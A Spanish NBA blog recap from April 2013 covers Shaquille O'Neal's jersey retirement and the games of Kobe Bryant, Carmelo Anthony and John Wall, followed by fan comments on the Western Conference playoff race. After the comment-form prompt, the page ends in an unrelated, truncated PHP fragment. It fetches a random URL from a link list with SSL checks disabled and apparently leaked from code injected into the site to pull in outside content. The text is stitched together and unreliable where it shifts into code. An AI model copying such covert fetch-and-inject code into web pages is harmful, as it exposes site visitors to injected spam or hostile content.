La Crónica: Pasado, presente y futuro

03 de April de 2013 por txusma

Anoche vivimos una de esas jornadas en las que el tiempo parece desaparecer y colapsarse. El pasado estuvo representando por la retirada del número 34 de Shaquille O’Neal en el Staples Center de Los Angeles en una ceremonia muy emotiva. Acompañado de su madre y sus 6 hijos, el “perro grande” contempló como su camiseta luce ya al lado de la de otros mitos como Karem Abdul-Jabbar, Wilt Chamberlain o Magic Johnson. Visiblemente emocionado Shaq dedicó unas palabras a la que había sido su afición durante 8 temporadas ante la presencia de Jack Nicholson, Jerry West y Phil Jackson, al que los aficionados no pararon de aplaudir. Los gritos de “We want Phil!” resonaron constantemente por todo el pabellón. El tiempo pasado siempre fue mejor.

La ceremonia fue una especie de viaje en el tiempo llevada a cabo en el descanso del trascendental Mavs-Lakers. Kobe Bryant, aislado totalmente en los vestuarios para no perder la concentración de cara a la 2ª mitad, no piensa permitir que los Lakers se queden fuera de los Playoffs y en 47 minutos de juego consiguió el décimonoveno triple doble de su carrera y desarmó a los Mavericks. Al final de la primera parte, los Lakers ya vencían de 15 ya  pesar de que en la 2ª la ventaja se redujo hasta los 5 puntos, los triples de Earl Clark (clave una vez más) y el propio Kobe mantuvieron la ventaja. A falta de 3 minutos apareció el aburrido Hack-a-Howard pero esta vez el pívot de los Lakers estuvo especialmente acertado y no permitió que Dallas se saliera con la suya (81-101). Con esta derrota los Mavs se descuelgan, parece que definitivamente, de la lucha por los Playoffs. Utah y Los Angeles se jugarán esa octava plaza. 

Carmelo Anthony fue el otro protagonista del día. Ante unos Heat sin Lebron, Wade ni Chalmers, el alero de los Knicks se fue a los 50 puntos, todos mediante tiros de media o larga distancia, ni uno desde la pintura. Lo gracioso es que anotó 37 puntos antes de capturar ningún rebote, dar alguna asistencia, robar algún balón o poner algún tapón. Nada, sólo anotación. Cada uno de los 50 puntos fueron necesarios para llevarse el partido porque Miami no lo puso nada fácil. Se fue al descanso 8 arriba y solo el acierto de Melo consiguió dar la vuelta al marcador (102-90).

Y finalmente queda hablar de futuro y de uno de sus máximos exponentes. La exhibición que dió anoche John Wall ante los Bulls es para guardarle en vídeo: 27 puntos, 8 rebotes, 9 asistencias, 3 tapones y victoria ante un equipo muy mermado por las lesiones (86-90). Taj Gibson ha sido el último en unirse a la ya de por sí extensa lista de bajas de Chicago.  Los Wizards llevan 8 victorias seguidas en casa y Wall tiene la mayor parte de culpa. Al ritmo que van es posible que adelanten a los Sixers y se conviertan en el noveno equipo del Este lo que llena de esperanzas a sus seguidores de cara a la temporada que viene.

PREMIOS

MVP: Ya los hemos nombrado a los 3. Carmelo Anthony se fue a los 50 puntos, Kobe Bryant consiguió un triple doble (23-11-11) y John Wall se quedó cerca (27-8-9). Los 3 se llevaron la victoria.

Sorpresa: Earl Clark fue el factor X que amarró la victoria para los Lakers cuando las cosas se apretaron en la 2ª parte. Acabó el partido con 17 puntos, 12 rebotes y 5 tapones. Pura energía.

Decepción: Los Mavs se lo jugaban todo prácticamente a una carta pero  fueron superados claramente por los Lakers. Vince Carter y Dirk Nowitzki se quedaron en 11 puntos con sendos 4 de 13.

Esfuerzo en vano: Ante el aluvión de bajas en sus respectivos equipos fueron Carlos Boozer (19-12-5) y Mike Miller (18-8-4) los que tiraron del carro pero no pudieron plantar cara a los protagonistas del día.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Denise dice:
    #1

    ¿Le retiraran la camiseta a Fisher?

      Citar

  2. MagicJohnson32 dice:
    #2

    Denise:
    ¿Le retiraran la camiseta a Fisher?

    No, a Fisher le harán un homenaje, seguro, pero no llegará a tanto como retirarle la camiseta.

    Del partido, para ambos equipos era fundamental ganar y se notó en la intensidad. Bryant dominó absolutamente el partido, controló el ritmo ejerciendo de base y en general los compañeros respondieron. Clark jugó su mejor partido en mucho tiempo y fue fundamental sin MWP ni Nash y con Jamison tocado.

    Creo que a partir de Kobe, la combinación Pau-Howard funciona mejor que cuando es Nash quien dirige. Pau y Bryant están acostumbrados a jugar con Bynum, y esa triple amenaza cuando Kobe dribla (tiro, pase a Pau al poste medio-alto, pase a Howard al poste bajo) empieza a dar réditos.

    El resultado prácticamente descarta a los Mavs y deja la competición por la 8ª plaza en una cosa de dos. Y esta noche, Nuggets-Jazz.

      Citar

  3. GreenPride dice:
    #3

    Partido fundamental en el Oeste por la 8ª y última plaza, La victoria de los Lakers deja prácticamente fuera de la lucha a los Mavs a los que su esfuerzo de última hora no les va a dar para llegar a PO. Sin duda una temporada para olvidar en los Mavs muy mediatizada por la lesión y posterior lenta entrada en juego de Robin Hood Nowitzki. Para los Lakers, victoria necesaria como el comer que sin embargo les deja todavía en 9º puesto por detrás de Utah ya que en caso de empate serán los Jazz los que irán a PO. Quedan 7 partidos para cada equipo, veamos:
    Lakers: Grizzlies, @Clippers, Hornets, @Blazers, Warriors, Spurs, Rockets.
    Jazz: Nuggets, Hornets, @Warriors, Thunder, Wolves, @Wolves, @ Grizzlies.
    La cosa sigue muy difícil para Lakers que deben ganar uno más de los que gane Utah y tienen 6 partidos contra equipos de PO que además se juegan cosas (Grizzlies y Clips la ventaja campo, Spurs el primer puesto, Rockets y Warriors el lugar de la clasificación). Al menos tienen 5 en casa. Creo que deberían ganar al menos 6 de los 7 para asegurarse entrar en PO pues ya sabemos que ganar en Utah es muy complicado y los Jazz tienen 4 en casa por lo que a poco que ganen el de los Wolves fuera o a los Grizzlies que en la última pueden no jugarse nada (o jugárselo todo en cuanto a ventaja campo) podrían llegar a ganar 5.
    Sí son las cuentas de la lechera pero el calendario en cuanto a rivales es mejor para Jazz por lo que los Lakers necesitarán hacerse fuertes de verdad en el Staples.
    Apasionantes últimos 7 partidos empezando hoy con la visita de Denver a Utah

      Citar

  4. GreenPride dice:
    #4

    He dicho que los Lakers tenían 6 partidos contra equipos de PO y son 5, perdón por el error.

      Citar

  5. Denise dice:
    #5

    GreenPride: He dicho que los Lakers tenían 6 partidos contra equipos de PO y son 5, perdón por el error.

    Pero jugar contra equipos de Playoffs puede ser una ventaja, porque por ejemplo, conociendo a Popovych, el penultimo partido de Lakers vs Spurs, lo mas probable es que Duncan, Parker y compañía no jueguen para tenerlos descansados de cara al primer partido de playoffs.

      Citar

  6. MagicJohnson32 dice:
    #6

    Denise: Pero jugar contra equipos de Playoffs puede ser una ventaja, porque por ejemplo, conociendo a Popovych, el penultimo partido de Lakers vs Spurs, lo mas probable es queDuncan, Parker y compañía no jueguen para tenerlos descansados de cara al primer partido de playoffs.

    Es posible que los Spurs se jueguen en ese partido jugar en primera ronda contra los Lakers o contra los Jazz. Vamos, que pondrá a Duncan, a Parker y si pudiese pondría a David Robinson, jeje.

    [Modo victimista ON]Menuda suerte de los Jazz, que en la última semana han jugado dos partidos contra los Blazers sin LaMarcus Aldridge, uno contra los Suns sin Dragic y hoy juegan contra los Nuggets sin Lawson. Sternato!![Modo victimista OFF]

      Citar

  7. nba dice:
    #7

    De Sternato nada, era extraño que Utah llevase una racha tan negativa con la calidad que tienen, a los Lakers no le queda otra que ganar todos sus partidos y aun asi tienen una alta probabilidad de quedarse fuera de playoffs, que en cierta manera seria bueno, porque asi darian pasaporte ya a D’antoni y a Pau

      Citar

  8. Denise dice:
    #8

    nba:
    De Sternato nada, era extraño que Utah llevase una racha tan negativa con la calidad que tienen, a los Lakers no le queda otra que ganar todos sus partidos y aun asi tienen una alta probabilidad de quedarse fuera de playoffs, que en cierta manera seria bueno, porque asi darian pasaporte ya a D’antoni y a Pau

    Bueno, a dia de hoy, no es fácil traspasar a Pau sin comerte otro contrato basura. Creo que lo mejor para Lakers es comerte el año que viene los 20 kilos de Pau, y que el catalan como buen profesional de el rendimiento que pueda, y en verano de 2014, reducir considerablemente tu masa salarial con el expiring integro de Pau, o reducir parcialmente tu cuadro de salarios renovandole por 8 kilos. (no sé si renovarle por esta cantidad es compatible con el rollo de los convenios salariales) , pero a dia de hoy, el valor salarial de Pau lo considero de unos 8 ó 9 millones.

      Citar

  9. MagicJohnson32 dice:
    #9

    nba:
    De Sternato nada…

    Ya hombre, era broma. Han tenido suerte con las bajas rivales esta semana, ya está, y es verdad que tienen calidad de sobra para estar ahí. En cuanto Mo Will ha cogido la forma el equipo ha ido para arriba.

      Citar

  10. Ruxixón dice:
    #10

    Sería gracioso que en ese Spurs vs Lakers donde estos se juegan el octavo puesto de conferencia privaran de ese primer puesto a los tejanos y pasarán a liderar la conferencia los Thunder dando un Thunder – Lakers en primera ronda

      Citar

  11. Denise dice:
    #11

    Ruxixón: Sería gracioso que en ese Spurs vs Lakers donde estos se juegan el octavo puesto de conferencia privaran de ese primer puesto a los tejanos y pasarán a liderar la conferencia los Thunder dando un Thunder – Lakers en primera ronda

    Pues a mi los Thunder, a pesar de su gran balance victorias/derrotas, no me acaban de convencer de cara a Playoffs. Les salva que Durant es muy bueno, pero a parte de eso, creo que tienen excesiva sobredepedencia de Durant & Westbrook. Si por cualquier motivo éstos 2 no están finos ó están siendo bien defendidos, no tienen a nadie más con un par de pelotas para echarse el equipo a las espaldas. Está Kevin Martin, pero es un jugador demasiado irregular, Ibaka en ataque no es malo pero no para cargar con el peso ofensivo, Sefolosha y Perkins solo son validos atrás, y sobre éstos 6 tios gira su juego, porque la plantilla es de las menos profundas entre los aspirantes.
    Los Heat a parte de su Big 3, tienen a Chalmers y una batería de triplistas como Allen, Battier, Miller ó Lewis; los Spurs tienen a Green, Leonard y Splitter; Clippers, Knicks, Grizzlies ó Nuggets tienen bastante profundidad, pero los Thunder pfff..para ganar el anillo, Durant deberá vestirse de Superman y el resto aportar más y ser mas regulares.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>